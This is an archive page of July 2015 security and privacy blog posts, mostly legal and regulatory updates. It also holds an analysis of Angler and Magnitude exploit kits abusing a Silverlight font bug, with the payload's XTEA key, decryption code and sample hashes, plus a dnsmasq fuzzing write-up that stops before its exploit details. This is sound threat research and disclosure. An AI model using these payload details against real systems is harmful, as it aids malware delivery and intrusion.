Monthly Archives: July 2015

Sites you use online may tarnish your reputation and relationships


Cybercitizens use sites on the Internet as resources that offer them services, with scant thought as to how their data and activity information could be used by site owners and others who have access to it. Those others include entities to whom the information is sold, cybercriminals who steal it, third parties who provide services to the site owners, and even innocuous users who stumble across the data because the site’s privacy protection, or in some cases its security, is inadequate.

Cybercitizens should note that many sites provide services for free, supported by advertising revenue. These sites collect and analyze profile and activity information, including clicks, page visits and transaction details, to selectively display advertisements suited to the user’s demographic profile or searches. This helps advertisers obtain better returns on their advertising dollar. Most of the larger and more popular sites make their users sign up to lengthy terms and conditions, which few read or understand, to enable them to use personal data. Larger, more established sites lay out well-worded privacy statements on their websites which users can read. In all cases, information related to financial transactions is normally governed by strict regulations and compliance regimes that restrict its use and specify standards for the security of card data.

But there are many other firms with questionable credentials whose ownership remains largely unknown. They may be popular sites too, but on the vast global highway there is no way to truly ascertain where your data resides, who sees it and what use it is put to. The hack of the extramarital affair dating site Ashley Madison clearly demonstrates the vulnerability of its users to reputational damage, blackmail and extortion. And there are many sites, pornographic sites for instance, whose membership, if disclosed, could hurt the reputations of millions of people.

The trail of personal data that one puts online remains. For example, curious users of the Ashley Madison site would have no way of proving to their spouse that they subscribed to the site out of curiosity and not with the intent to use it.

The effect of disclosure of personal data varies from tarnished reputation and financial losses to minor privacy intrusions. Cybercitizens should evaluate these risks and their potential consequences when they use certain sites.

EDPS Issues Opinion and Launches Regulation App for Mobile Devices

On July 27, 2015, Giovanni Buttarelli, the European Data Protection Supervisor (“EDPS”), published Opinion 3/2015 on the reform of Europe’s data protection laws, intended to “assist the participants in the trilogue in reaching the right consensus on time.” The Opinion sets out the EDPS’ vision for the regulation of data protection, re-stating the case for a framework that strengthens the rights of individuals and noting that “the time is now to safeguard individuals’ fundamental rights and freedoms in the data-driven society of the future.”

In addition, the Opinion contains a four-column version of the text of the proposed EU General Data Protection Regulation (“GDPR”), comparing on an article-by-article basis the proposals of the European Commission, the European Parliament, the Council of the European Union and the EDPS’ detailed recommendations. At the same time, the EDPS launched a free app for mobile devices, allowing users to easily compare the respective texts. These can be downloaded in any given combination to allow users to compare them side-by-side on smartphones and tablets.

In offering its recommendations on the GDPR, the EDPS draws from across the three texts, for the most part steering a course between those of the European Parliament and the Council. In some respects, the EDPS favors practicality, but in other areas it adopts an approach focused on strengthening individual rights.

The trilogue began only recently, and an ambitious timetable has been set for the discussions. It remains to be seen whether the text of the GDPR will be agreed upon by the end of this calendar year, but the political pressure to reach agreement is growing. The EDPS has now added its voice to the debate, urging the EU to make the most of this historic opportunity for reform.

States Writing Biometric-Capture Laws May Look to Illinois

Recent class actions filed against Facebook and Shutterfly are the first cases to test an Illinois law that requires consent before biometric information may be captured for commercial purposes. Although the cases focus on biometric capture primarily in the social media realm, these cases and the Illinois law at issue have ramifications for any business that employs biometric-capture technology, including those who use it for security or sales-and-marketing purposes. In a recent article published in Law360, Hunton & Williams partner Torsten M. Kracht and associate Rachel E. Mossman discuss how businesses already using these technologies need to keep abreast of new legislation that might affect the legality of their practices, and how businesses considering these technologies should consult local rules and statutes before implementing biometric imaging.

Read the full article now.

Happy Birthday – Smoothwall Celebrates 15 Years



Fifteen years ago, Lawrence Manning, a co-founder of Smoothwall, sat in his front room putting the final touches on a prototype for a special kind of software. 

This week, we spent some time catching up with Lawrence as he reflects on Smoothwall's 15-year progression from an Open Source Linux project to the UK's number one web filter.

SW: Where did the name Smoothwall come from?


LM: We had a couple of ideas for names. Since we were trying to popularize this through the Linux user groups, one of our ideas was to call it LUGWall. I’m glad we didn’t choose that! “SoHo” was a popular buzzword at the time, so we also had SoHo-Connect. And one of the other rejected names was WebbedWall, which I kind of like. The idea was also to have a “family” of projects one day, so we wanted a name that could be adapted: SmoothMail (an email solution) and SmoothLinux (a desktop distribution based on Smoothwall ideas). Needless to say, nothing came of those ideas. There were rumours that the “Wall” part was named in honour of Larry Wall, the original author of the Perl programming language, the main language used in the project. I’m still not certain how much truth there is in this, but it’s a nice touch if it is true. Anyway, we went through a bunch of names and liked Smoothwall the best.

SW: What prompted you to start the first Open Source Smoothwall?

LM: The need for something to do! Not working at the time, I had energy to spend. And also the, maybe arrogant, belief that I could do something “better”. There were alternatives around, not many, but some, and every one that we looked at was difficult to use and difficult to set up. The combination of those things was a pretty good driver.

SW: Why did you choose Open Source instead of Proprietary?

LM: Open Source is “free marketing”. I’m far from a believer that Open Source is the only way to make good software, but it is a great way to get people interested in what you are doing. In the early days of the project, I wrote all the code. But the fact it was Open Source (though it wasn’t run like a typical Open Source project) meant that people felt encouraged to tinker with it, and that led to ideas, and eventually code being contributed. This would not have happened if we’d kept the code closed; the interest just wouldn’t have been there.

SW: Why Linux?

LM: Well, there weren’t really any alternatives. I guess compared to the BSDs the driver support was better, but more than that, it was familiar. And we liked it of course. It was, and remains, the best platform for this kind of product, evidenced by the fact that everyone uses it in everything.

SW: What does it feel like to have invented a product that is responsible for 150 jobs?

LM: Obviously I’m very proud of what we have accomplished. What is especially gratifying, beyond the fact that we’ve created a company with, I believe it is right to say, a good ethical record, is that its main business is keeping people safe.

SW: Did you imagine when you started that Smoothwall would be where it is today?

LM: Nope! I honestly believed this thing would go on for about six months, and then I’d be forced back to Windows development work, with Smoothwall just another little project to add to the list of little projects I’d worked on over the years.

SW: What's your favorite Star Trek character, or episode and why?

LM: 7 of 9? Actually it is Scotty. Series wise, The Original Series still stands the test of time. Within that series, I have too many favourite episodes to list. The newer stuff is good too of course, but you can’t beat TOS. Oh, and “Into Darkness” sucks!

SW: How did you meet George and Daniel?

George: I first met him at a motorway service station, near Exeter I think, to discuss commercial angles around Smoothwall. I was quite apprehensive because prior to it he’d sent me a big list of technical questions about Smoothwall, many of which I had no idea how to answer!

Daniel: Well, George headhunted him. Prior to actually meeting him I’d downloaded his DansGuardian software, which is basically what we wanted Daniel for, and played around with it, and of course had loads of questions. We got on great from the beginning, though I do remember being appalled by his first crack at a Guardian user interface!

SW: What's your best Smoothwall memory?

LM: There are many, of course. From a development point of view, I don’t believe I have ever been as productive as I was in the 3 months after the company was founded. In those 3 months I wrote the first versions of our VPN add-on (which is roughly what is sold today), a simple web filter module, and other things. Working only from one-sentence requirements, on your own, having to design UIs yourself, having to actually get the thing to do what it has to do and having to test it all, is both intimidating and extremely rewarding.

I remember writing the first version of an early add-on module called SmoothHost in this way, in an afternoon. Over the years we probably made a million pounds in revenue from that afternoon’s work. That kind of pure creative, seat-of-the-pants way of working, I have to admit, I miss immensely.


Outside of the working environment, we’ve had some great company weekends. My favorite is probably the trip to Coniston in the Lake District. I think it was 2007. The company was still “innocent” then. It was a superb weekend.


Federal Court: Seventh Circuit Holds Data Breach Class’s Allegations Against Neiman Marcus Satisfy Article III Standing

On July 20, 2015, the United States Court of Appeals for the Seventh Circuit reversed a previous decision that dismissed a putative data breach class action against Neiman Marcus for lack of Article III standing. Remijas et al. v. Neiman Marcus Group, LLC, No. 14-3122.

The litigation arose from a 2013 data breach in which approximately 350,000 customers’ cards were exposed. The named plaintiffs in the consolidated actions sought to represent all of the roughly 350,000 customers whose card numbers were compromised, including the more than 340,000 customers who did not discover any fraudulent use of their cards. The plaintiffs’ causes of action included: negligence, breach of implied contract, unjust enrichment, unfair and deceptive business practices, invasion of privacy and violations of multiple state data breach laws.

Alleged categories of injury. Plaintiffs claimed four categories of actual injury: (1) lost time and money resolving the fraudulent charges; (2) lost time and money protecting themselves against future identity theft; (3) overpayment for items because the store allegedly failed to invest in adequate cybersecurity; and (4) lost control over their personal information. They also asserted two imminent injuries: increased risk of future fraudulent charges and greater susceptibility to identity theft. The court ruled that the first two categories of actual injury and the two imminent injuries satisfied Article III standing.

Clapper distinguished for imminent injuries. The Seventh Circuit’s analysis of imminent injury distinguished the Supreme Court of the United States’ opinion in Clapper v. Amnesty Int’l USA, 133 S. Ct. 1138 (2013). In Clapper, the complainants were not able to show that the act underlying the alleged injuries had occurred, or that the alleged harm was “certainly impending.” Finding support in a footnote from Clapper, the Seventh Circuit stated that standing could be established when the “substantial risk” of future harm causes a party to take reasonable steps to mitigate those imminent damages. The court found that although 9,200 customers had been reimbursed for actual fraudulent charges, redress for future fraudulent charges or future identity theft remained uncertain. It also held that there was an “objectively reasonable likelihood” that identity theft would occur.

Two actual injuries found adequate for standing. The court’s analysis of the actual injuries also distinguished Clapper, where the complained-of act may not have even happened to some or all of the plaintiffs. In contrast, the actual injuries related to the Neiman Marcus breach stemmed from an event that unquestionably occurred. Therefore, the lost time and money spent protecting against future identity theft and fraudulent charges were sufficient for standing and more than de minimis.

Overpayment and lost-control bases for injury not analyzed. Because it found adequate injury to support standing with the first two categories of injury, the panel declined to address the remaining two theories arising from overpayment and lost control. The court described these asserted injuries as “more problematic,” and it is questionable whether they would be sufficient, on their own, to establish standing.

Causation and redressability. The court stated that other large-scale data breaches that occurred around the same time had “no bearing” on the traceability of the breach to Neiman Marcus. Rather, the court viewed this as a defense that might be raised by Neiman Marcus later in the proceedings. Regarding redressability, it also held that reimbursement of actual fraudulent charges did not negate the injuries related to mitigation expenses or future injuries.

Rule 12(b)(6) arguments not addressed. The Seventh Circuit declined to analyze the dismissal under Federal Rule of Civil Procedure 12(b)(6) because the district court decided the case on the standing issues alone, and Neiman Marcus did not file a cross-appeal for additional relief.

While the case has been remanded to the district court for further proceedings, it is another indicator that data breach litigants are more likely to weather a standing attack in the Ninth and Seventh Circuits compared to other federal circuits.

Read the full opinion from the Seventh Circuit.

Cyber Risks in a “Connected World” Can Claim Human Lives and Cause Physical Damage

I believe that cyber risks are routinely underestimated or trivialized. Over the last few years, the rapid digitization of businesses has brought a growing spate of cyber attacks the world over. New start-ups offer a plethora of digitized solutions through cloud platforms. With limited budgets and a focus on perfecting their business model, these companies must navigate the tradeoff between the portion of their financial capital that goes into product security and the portion that goes into growing the business.

The next phase of digital evolution is themed “connected”: connected cars, connected homes and connected humans (with intelligent body parts such as wireless-enabled pacemakers). As businesses race to bring out new connected products, or to make existing products intelligent using Internet-enabled sensors, wireless, cloud management and mobile apps, they still seem not to realize how critical it is to foolproof these systems against cyber threats.

The risks now extend beyond purely financial and reputational losses to threats that affect human lives. As the world digitizes, cyber threats that damage property, cause physical harm and even kill will materialize at a scale that is virtually impossible to contain.

An early indication is the recent recall of 1.4 million vehicles by Fiat Chrysler Automobiles, the world's seventh-largest automaker, to fix a vulnerability that allowed hackers to use the cellular network to electronically control vital functions. When manipulated, those functions could shut the engine down while the vehicle was being driven down the highway, take control of the steering wheel and disable the brakes. Similar threats would materialize if hackers were able to find flaws in wireless pacemakers or other such devices.

The core issue is twofold. First, as the connected world becomes individualized, malicious hackers will find and exploit flaws in products used by the individuals or organizations they target. Remotely engineered assassinations may just become a reality.

The second and more dangerous consequence is terrorist organizations exploiting vulnerabilities in products used by many, cars for example, to launch mass attacks that would instantly cause more damage and widespread chaos than detonating explosives. Such remote attacks from the Internet would bypass all conventional border security measures.

In a digitized world, cybersecurity and safety become intrinsically linked, and as new standards slowly evolve, companies must make an immediate, concerted effort to build secure products that protect naïve cybercitizens against all sorts of risks.


For a cybercitizen, security should be under the hood, so to speak. Cybercitizens are unable to determine the extent to which these products are safe to use. Besides building safe products, systems to securely and instantly plug vulnerabilities will need to be perfected.

Hunton Publishes Several Chapters in International Comparative Legal Guide to Data Protection

Hunton & Williams is pleased to announce its participation with the Global Legal Group in the publication of the second edition of the book The International Comparative Legal Guide to: Data Protection 2015. Members of the Hunton & Williams Global Privacy and Cybersecurity team prepared several chapters in the guide, including the opening chapter on “Legislative Change: Assessing the European Commission’s Proposal for a Data Protection Regulation,” and chapters on Belgium, China, France, Germany, the United Kingdom and the United States.

The guide provides privacy officers and in-house counsel with a comprehensive overview and analysis of data protection laws and regulations around the world. It begins with the first chapter on the proposed European legislative reform and then covers existing laws and regulations in 32 jurisdictions.

Bridget Treacy, partner and head of the UK Privacy and Cybersecurity practice, served as the contributing editor of the guide and co-authored the United Kingdom chapter. Additional Hunton & Williams authors included: Anita Bapat (United Kingdom), David Dumont (Belgium), Claire François (France), Dr. Jörg Hladjk (Germany), Chris D. Hydak (United States), Manuel E. Maisog (China), Wim Nauwelaerts (Belgium) and Aaron P. Simpson (United States).

Hunton & Williams’ Global Privacy and Cybersecurity practice group assists organizations in managing privacy and data security risks associated with the collection, use and disclosure of consumer and employee personal information. Hunton & Williams has been ranked as the top law firm globally for privacy and data security by Computerworld magazine in all of its surveys, and has been rated by Chambers and Partners as the top privacy and data security practice in its Chambers Global, Chambers Europe, Chambers UK and Chambers USA guides.

The privacy practice also maintains The Centre for Information Policy Leadership, a privacy think tank and consulting practice that leads public policy initiatives that promote responsible information governance necessary for the continued growth of the information economy.

Read the full news release.

Connecticut Passes New Data Protection Measures into Law

On July 1, 2015, Connecticut’s governor signed into law Public Act No. 15-142, An Act Improving Data Security and Agency Effectiveness (the “Act”), which (1) amends the state’s data breach notification law to require notice to affected individuals and the Connecticut Attorney General within 90 days of a security breach, and expands the definition of personal information to include biometric data such as fingerprints, retina scans and voice prints; (2) affirmatively requires all businesses, including health insurers, that experience data breaches to offer one year of identity theft prevention services to affected individuals at no cost to them; and (3) requires health insurers and contractors who receive personal information from state agencies to implement and maintain minimum data security safeguards. With the passage of the Act, Connecticut becomes the first state to affirmatively require businesses to provide these security services to consumers.

A brief summary of the data security requirements for health insurers and state contractors is set forth below:

Health Insurers

The new legislation requires health insurers and related entities (including pharmacy and third-party benefits administrators) to:

  • Create a comprehensive information security program to safeguard individuals’ personal information.
  • Encrypt personal information being transmitted or while stored on a portable device.
  • Implement security measures to protect personal information stored on Internet-accessible devices.
  • Implement access controls and authentication measures to ensure that access to personal information is limited only to those who need it in connection with their job function.
  • Ensure that employees and third parties comply with data security requirements.

These requirements are effective October 1, 2015, but health insurers have until October 1, 2017, to come into full compliance.

State Contractors

Additionally, the Act requires that contracts between a state agency and a contractor authorizing the contractor to receive personal information include terms and conditions requiring the contractor to implement data security measures to protect the relevant personal information. The minimum data security requirements for contractors are substantially similar to the requirements for health insurers listed above, but also include additional requirements that the contractor:

  • Obtain approval from the contracting state agency to store data on removable storage media.
  • Report any suspected or actual breaches of the personal information to the state as soon as practical after discovery.

The section pertaining to state contractors is effective July 1, 2015.

Read the complete terms of the Act.

CVE-2015-1671 (silverlight up to 5.1.30514.0) and Exploit Kits



Patched with MS15-044, CVE-2015-1671 is described as a TrueType Font Parsing Vulnerability.
Silverlight versions up to 5.1.30514.0 are affected, but note: most browsers will warn that the plugin is outdated.

Out of date Plugin protection in Chrome 39.0.2171.71
Out of date ActiveX controls blocking in Internet Explorer 11
(introduced in August 2014)



and also consider that Microsoft announced the end of Silverlight at the beginning of the month.

Angler EK :
2015-07-21

Around the 1st of July, some new Silverlight-focused code appeared in the Angler EK landing.
It even seems the coders left some debugging in, or got something wrong, as you could see this kind of popup on Angler EK for several hours.
Deobfuscated snippet of the Silverlight call exposed to victims in Angler EK
2015-07-02
I failed to get anything other than 0-size Silverlight calls.
I heard about filled calls from Eset and EKWatcher.
The exploit sent was 3fff76bfe2084c454be64be7adff2b87 and appears to be a variation of CVE-2015-1671 (Silverlight 5 before 5.1.40416.00). I spent hours trying to get a full exploit chain... no luck. Only 0-size calls.

But it seems it's back today (or I got more lucky?):

--
Disclaimer: many indicators are whispering that it's the same variation of CVE-2015-1671, but I am still waiting for a strong confirmation.
--

Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in IE 11 on Windows 7
2015-07-21

Silverlight 5.1_10411.0 exploited by Angler EK via CVE-2015-1671 in Chrome 39 on Windows 7
2015-07-21

Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in Firefox 38 on Windows 7
2015-07-21

Two DLLs (x86 and x64) are encoded in the payload stream with the XTEA key: m0boo69biBjSmd3p
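
The post doesn't ship extraction code, but a single XTEA block decryption looks roughly like the following Python sketch. Treat it as illustrative only: the word endianness, round count, cipher mode and any extra encoding layers in the actual stream are assumptions you would need to confirm against the sample.

import struct

def xtea_decrypt_block(key, block, rounds=32):
    # Decrypt one 8-byte XTEA block with a 16-byte key (four 32-bit words).
    # Big-endian words are an assumption; the real stream may be little-endian.
    v0, v1 = struct.unpack(">2L", block)
    k = struct.unpack(">4L", key)
    delta = 0x9E3779B9
    total = (delta * rounds) & 0xFFFFFFFF
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (total + k[(total >> 11) & 3]))) & 0xFFFFFFFF
        total = (total - delta) & 0xFFFFFFFF
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (total + k[total & 3]))) & 0xFFFFFFFF
    return struct.pack(">2L", v0, v1)

key = b"m0boo69biBjSmd3p"  # the XTEA key recovered from the payload stream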


Silverlight dll in DotPeek after Do4dot

Sample in those passes: ac05e093930662a2a2f4605f7afc52f2
(Off-topic: the payload is Bedep, which then gathers an ad-fraud module - you have the XTEA key if you want to extract it)

Files: Fiddler (password is malware)
[Edit: 2015-07-26, this has been spread to all Angler threads]

Thanks for help/tips :
Eset, Microsoft, Horgh_RCE, Darien Huss, Will Metcalf, EKWatcher.

Magnitude :
2015-07-28 : spotted by Will Metcalf in Magnitude.
It's a rip of Angler's implementation.

Silverlight 5.1.30514.0 exploited by Magnitude
2015-08-29
Files: Fiddler (password is malware)


Read more :
CVE-2013-0074/3896 (Silverlight) integrates Exploit Kits - 2013-11-13


FERC Proposes to Accept Updated CIP Standards and Calls for New Cybersecurity Controls

On July 16, 2015, the Federal Energy Regulatory Commission (“FERC”) issued a new Notice of Proposed Rulemaking (“NOPR”) addressing the critical infrastructure protection (“CIP”) reliability standards. The NOPR proposes to accept, with limited modifications, seven updated CIP cybersecurity standards. It also proposes that new requirements be added to the CIP standards to protect against malware campaigns targeting supply chain vendors, and it addresses risks to utility communications networks.

The CIP standards govern the cyber and physical security of the bulk electric system. They are mandatory and enforceable. Utilities that violate them are potentially subject to substantial financial penalties. CIP standards are developed, administered, and enforced by the North American Electric Reliability Corporation (“NERC”) subject to FERC’s oversight.

The NOPR identifies malware campaigns targeting supply chain vendors as a serious security threat that is not addressed by existing CIP standards. It therefore proposes to direct NERC to develop CIP requirements relating to supply chain management for industrial control system hardware, software and services. It offers specific guidance as to the elements that FERC believes such standards should have, including that they be forward-looking, objective-driven and consistent with guidance offered by the National Institute of Standards and Technology in NIST SP 800-161.

In addition, the NOPR builds on earlier FERC orders conditionally accepting “version 5” of the CIP standards. Version 5 made various incremental improvements to earlier iterations of the CIP standards. FERC directed NERC to further revise the version 5 requirements to make them clearer, more specific, and more readily enforceable. It also instructed NERC to develop: (1) enhanced security controls for “low impact” assets; (2) controls to address the risks posed by “transient” electronic devices (e.g., thumb drives and laptops); and (3) a clearer definition of the term “communications networks.”

In response, NERC proposed seven updated “version 6” CIP standards in February that incorporated FERC’s directives. The new NOPR proposes to largely accept version 6 but requires NERC to broaden the scope of communications network protections from a limited group of control centers to “communication network components and data communicated between all bulk electric system Control Centers.” FERC also specifically seeks comments on the sufficiency of existing CIP controls regarding remote access used in relation to bulk electric system communications.

FERC’s actions are consistent with its history of continuously urging NERC to improve, and to broaden the scope of, the CIP standards. But the NOPR is also only the third time that FERC has proposed to use its authority to require NERC to propose a new reliability standard, highlighting the close attention that FERC has devoted to cybersecurity threats generally and its concern about evolving malware vulnerabilities in particular.

Written comments on the NOPR will be due 60 days after its publication in the Federal Register. If the proposed version 6 CIP standards are accepted, they would supersede the not-yet-implemented version 5 standards and become effective no earlier than April 2016.

FCC Issues Clarifications Regarding the Telephone Consumer Protection Act

On July 10, 2015, the Federal Communications Commission (“FCC”) released a Declaratory Ruling and Order that provides guidance with respect to several sections of the Telephone Consumer Protection Act (“TCPA”). The Declaratory Ruling and Order responds to 21 separate requests from industry, government and others seeking clarifications regarding the TCPA and related FCC rules.

The majority of the clarifications relate to the sending of automated calls and text messages to consumers. For example, a few organizations requested clarification regarding the scope of the term “autodialer,” as many restrictions in the TCPA are triggered only if the sender used an autodialer to initiate a telephone call or text message. The Declaratory Ruling and Order states that Congress “intended a broad definition of autodialer,” and that equipment can be considered an autodialer if it has the capacity to dial random or sequential numbers but lacks the present ability to do so. Other highlights of the Declaratory Ruling and Order are provided below.

  • The FCC reviews the totality of the attendant circumstances regarding a particular call or text to determine who “initiated” or “made” the call or text for the purposes of the TCPA. The totality of the circumstances should be examined to determine (1) “who took the steps necessary to physically place the call;” and (2) “whether another person or entity was so involved in placing the call as to be deemed to have initiated it.”
  • Recipients of calls may “revoke consent at any time” to receive autodialed or prerecorded calls or text messages using any reasonable means.
  • Merely having another person’s wireless number in a contact list on a phone, by itself, does not demonstrate consent to send that person autodialed or prerecorded calls or text messages.
  • The TCPA requires the consent of the “current subscriber” of the call or text message, not the consent of the intended recipient. Accordingly, if an organization obtained consent from a consumer to send him or her autodialed or prerecorded calls or texts, and the consumer’s number is later reassigned to another consumer, the organization does not have consent to make autodialed or prerecorded calls or texts to the second consumer even if the organization intended to make the call or text to the original consumer. The Declaratory Ruling and Order states, however, that an organization may not be liable under the TCPA for the first call to the second consumer if the organization does not have knowledge of the reassignment.
  • One-time text messages “sent in response to a consumer’s request for information” do not violate the TCPA if (1) the text message is requested by the consumer, (2) the consumer receives only one message, and (3) the message does not contain information not requested by the consumer.

Read the full Declaratory Ruling and Order.

Indonesia Publishes Proposed Data Protection Rule

On July 14, 2015, pursuant to an implementation requirement of Government Regulation 82 of 2012, the Indonesian government published the Draft Regulation of the Minister of Communication and Information (RPM) on the Protection of Personal Data in Electronic Systems (“Proposed Regulation”). The Proposed Regulation addresses the protection of personal data collected by a variety of government agencies, enumerates the rights of those whose personal data is collected and sets out the obligations of users of Information Communication Technology. Agencies to which the Proposed Regulation would apply include: the Directorate General of Immigration, which manages passport data; the Financial Services Authority, which regulates financial sector data; the Bank Indonesia, which regulates banking data; the Indonesian Consumers Foundation, which regulates protection of consumer data; the National Archives; and the Ministry of Health, which regulates health data and archives. The government provided a 10-day comment period for the proposal.

The Indonesian government also recently issued proposed guidelines for the registration of software to be used in “public services.” The guidelines carry out a mandate from Government Regulation No. 82 of 2012. The guidelines, as proposed, would require such software to be registered with the Ministry of Communications and Information Technology and meet certain requirements for security and reliability. One potential weakness of the guidelines is their failure to define “public services.” The government will accept public comments on this proposal through July 31.

House of Representatives Passes Bill to Permit Broader Use and Disclosure of Protected Health Information for Research Purposes

On July 10, 2015, the United States House of Representatives passed the 21st Century Cures Act (the “Act”), which is intended to ease restrictions on the use and disclosure of protected health information (“PHI”) for research purposes.

Currently, the HIPAA Privacy Rule permits the use and disclosure of PHI for research purposes without requiring authorization from an individual but does require that any waiver of the authorization requirement be approved by an institutional review board or a privacy board.

The Act amends the Health Information Technology for Economic and Clinical Health (“HITECH”) Act to obligate the Secretary of the Department of Health and Human Services to revise or clarify the HIPAA Privacy Rule to:

  • Allow the use and disclosure of PHI by a covered entity for research purposes to be treated as that entity’s “health care operations.”
  • Enable research activities that are related to the quality, safety, or effectiveness of a product or activity that is regulated by the Food and Drug Administration (“FDA”) to be considered public health activities so that the activities can be disclosed to a person subject to the FDA’s jurisdiction for the purposes of collecting or reporting adverse events, tracking FDA-regulated products, enabling product recalls or repairs or conducting post-marketing surveillance.
  • Permit remote access to PHI so long as the covered entity and researcher maintain “appropriate security and privacy safeguards” and the PHI is “not copied or otherwise retained by the researcher.”
  • Specify that an authorization for the use or disclosure of PHI for future research purposes is deemed to sufficiently describe the purpose of the use or disclosure of PHI if the authorization (1) sufficiently describes the purposes such that it would be reasonable for the individual to expect that the PHI could be used or disclosed for such future research, and (2) states that the authorization will either expire on a particular date or at a particular event or will remain valid “unless and until it is revoked by the individual.”

The Act also requires the Office of the National Coordinator for Health Information Technology to publish guidance that clarifies the HIPAA Privacy and Security Rules with respect to information blocking, which includes any business or technical practices that “prevent or materially discourage the exchange of electronic health information” and “do not serve to protect patient safety, maintain the privacy and security of individuals’ health information or promote competition and consumer welfare.”

The Act, which garnered widespread bipartisan support, now moves to the Senate, which is expected to take up the legislation this fall.

Several groups, including the Pharmaceutical Research and Manufacturers of America and the Association of American Medical Colleges, support the 21st Century Cures Act.

Hunton Webinar on the Proposed EU General Data Protection Regulation: Preparing for Change

On July 9, 2015, Hunton & Williams LLP hosted a webinar on the Proposed EU General Data Protection Regulation: Preparing for Change (Part 1). Hunton & Williams partner and head of the Global Privacy and Cybersecurity practice Lisa Sotto moderated the session, which was led by speakers Bridget Treacy, managing partner of the firm’s London office; Wim Nauwelaerts, managing partner of the firm’s Brussels office; and Jörg Hladjk, counsel in the firm’s Brussels office. Together the speakers presented an overview of the proposed EU General Data Protection Regulation, discussed expected changes from the existing Directive, and offered guidance on how to prepare for the next steps. The webinar was the first segment of a two-part series. Part II will be held later this year as negotiations continue to develop.

View a recording of the webinar now.

Draft Cybersecurity Law Published for Comment in China

On July 6, 2015, the Standing Committee of the National People’s Congress of the People’s Republic of China published a draft of the country’s proposed Network Security Law (the “Draft Cybersecurity Law”). A public comment period on the Draft Cybersecurity Law is now open until August 5, 2015.

At this point, the Draft Cybersecurity Law has not yet been finalized. The draft contains, however, a number of provisions that are significant, insofar as they reveal underlying assumptions and priorities that govern the development and promotion of cybersecurity in China. If even a handful of these provisions make their way into the final version, the law could prove itself to be consequential.

One such provision actually manifests in a number of clauses that firmly and clearly establish the government’s leading role in the furtherance of cybersecurity. In the Draft Cybersecurity Law, certain, relevant private firms are referred to as “network operators” and “operators of key information infrastructure.” Regardless of their technological resources and practical experience, these operators are required by the Draft Cybersecurity Law to support and cooperate with the government’s leading role in the furtherance of cybersecurity, rather than exercising a leading role of their own.

Another striking provision is one that would allow government bodies at certain levels to adopt measures to restrict the transmission of information over the Internet in places where public safety “incidents” (referred to somewhat euphemistically as “社会安全事件”) have erupted. This may be done to preserve the national security and public social order. It may become difficult to contact someone via the Internet who is in a place where such an “incident” has recently occurred. Already in practice in affected areas where there has been a “public safety incident,” short messaging services are usually restricted, and ingoing and outgoing telephone calls are strictly supervised.

The Draft Cybersecurity Law also includes a provision that pushes China towards a policy of data localization. Pursuant to this provision, important data (such as the personal information of citizens) must be stored within the territory of the People’s Republic of China. Notably, the restriction appears to be limited and would apply only to operators of key information infrastructure, largely enterprises in heavily licensed and regulated industries such as providers of basic and value-added telecommunications services, energy, utilities and health care services. The provision also appears to allow for cross-border transfers even by operators of key information infrastructure when there is an operational requirement for the transfer, as long as a security assessment has been conducted. The precise requirements of the security assessment, however, are not spelled out in the Draft Cybersecurity Law.

There are many other significant provisions in this potentially impactful draft law, including some that reiterate rules for the handling of personal data by requiring network operators to observe strict confidentiality and to not disclose, falsify, destroy, sell or illegally provide personal information of citizens which they have collected. Another provision requires network operators who collect personal information to do so only in a lawful and proper manner, to collect only what is necessary, to clearly state the purposes, method and scope of the collection and to obtain the consent of the data subject. Many of these provisions overlap with some of the requirements on the handling of “electronic personal information” imposed by the December 2012 Resolutions.

We will report further on the content of the law, particularly after the final version has been published.

How I nearly almost saved the Internet, starring afl-fuzz and dnsmasq

If you know me, you know that I love DNS. I'm not exactly sure how that happened, but I suspect that Ed Skoudis is at least partly to blame.

Anyway, a project came up to evaluate dnsmasq, and since dnsmasq is a DNS server - and a key piece of Internet infrastructure - I thought it would be fun! And it was! By fuzzing in a somewhat creative way, I found a really cool vulnerability that's almost certainly exploitable (though I haven't proven that, for reasons that'll become apparent later).

Although I started writing an exploit, I didn't finish it. I think it's almost certainly exploitable, so if you have some free time and you want to learn about exploit development, it's worthwhile having a look! Here's a link to the actual distribution of a vulnerable version, and I'll discuss the work I've done so far at the end of this post.

You can also download my branch, which is similar to the vulnerable version (branched from it); the only difference is that it contains a bunch of fuzzing instrumentation and debug output around parsing names.

dnsmasq

For those of you who don't know, dnsmasq is a service that you can run that handles a number of different protocols designed to configure your network: DNS, DHCP, DHCP6, TFTP, and more. We'll focus on DNS - I fuzzed the other interfaces and didn't find anything, though when it comes to fuzzing, absence of evidence isn't the same as evidence of absence.

It's primarily developed by a single author, Simon Kelley. It's had a reasonably clean history in terms of vulnerabilities, which may be a good thing (it's coded well) or a bad thing (nobody's looking) :)

At any rate, the author's response was impressive. I made a little timeline:

  • May 12, 2015: Discovered
  • May 14, 2015: Reported to project
  • May 14, 2015: Project responded with a patch candidate
  • May 15, 2015: Patch committed

The fix was actually pushed out faster than I managed to report the bug! (I didn't report for a couple of days because I was trying to determine how exploitable / scary it actually was - it turns out that yes, it's exploitable, but no, it's not scary - we'll get to why at the end.)

DNS - the important bits

The vulnerability is in the DNS name-parsing code, so it makes sense to spend a little time making sure you're familiar with DNS. If you're already familiar with how DNS packets and names are encoded, you can skip this section.

Note that I'm only going to cover the parts of DNS that matter to this particular vulnerability, which means I'm going to leave out a bunch of stuff. Check out the RFCs (rfc1035, among others) or Wikipedia for complete details. As a general rule, I encourage everybody to learn enough to manually make requests to DNS servers, because that's an important skill to have - plus, it's only like 16 bytes to remember. :)

DNS, at its core, is actually rather simple. A client wants to look up a hostname, so it sends a DNS packet containing a question to a DNS server (on UDP port 53, normally, but TCP can be used as well). Some magic happens, involving caches and recursion, then the server replies with a DNS message containing the original question, and zero or more answers.
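
To make that concrete, here's a minimal Python sketch of one such exchange. The raw query bytes are the same hand-built google.com request used later in this post, and 8.8.8.8 is just a convenient public resolver:

import socket

# trn_id 0x1234, RD flag set, one question: an A record for google.com
query = (b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
         b"\x06google\x03com\x00\x00\x01\x00\x01")

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(5)
s.sendto(query, ("8.8.8.8", 53))
response, _ = s.recvfrom(4096)  # the reply echoes the question, plus answers
print(response.hex())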

DNS packet structure

The structure of a DNS packet is:

